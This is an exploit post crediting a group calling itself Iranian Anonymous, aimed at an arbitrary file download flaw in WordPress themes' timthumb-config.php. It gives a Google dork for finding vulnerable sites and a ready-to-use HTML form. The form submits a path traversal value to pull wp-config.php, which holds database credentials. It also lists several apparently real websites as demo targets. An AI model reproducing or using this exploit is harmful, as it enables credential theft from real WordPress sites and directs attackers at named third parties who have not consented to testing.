########################## # Exploit Title: Wordpress Themes Arbitrary File Download timthumb-config.php Vulnerability # Google Dork : wp-content/themes/lib/timthumb-config.php # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # Tested on : Windows7 ########################## # Wordpress Multi Themes Arbitrary File Download an Exploit Allow Attackers to Download # Files From Your Website and The Vulnerable File is : timthumb-config.php # so Any Theme Wordpress Has This File Then he is Potentially Vulnerable ###################### Exploit : www.site.com//wp-content/themes/infocus/lib/scripts/timthumb/timthumb-config.php ##################### <html> <body> <form action="http://www.site.com/wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php" method="post"> Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br> <input type="submit"> </form> </body> </html>> ############################## Demo : http://stepsandwings.net/wp-content/themes/infocus/lib/scripts/timthumb/timthumb-config.php http://www.aimmachines.com//wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php http://www.deepwebtech.com/wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php http://clarksonjewelers.com/wp-content/themes/elegance/lib/scripts/timthumb/timthumb-config.php ################################### #Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd ||Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous . # Discovered By: Hacker Khan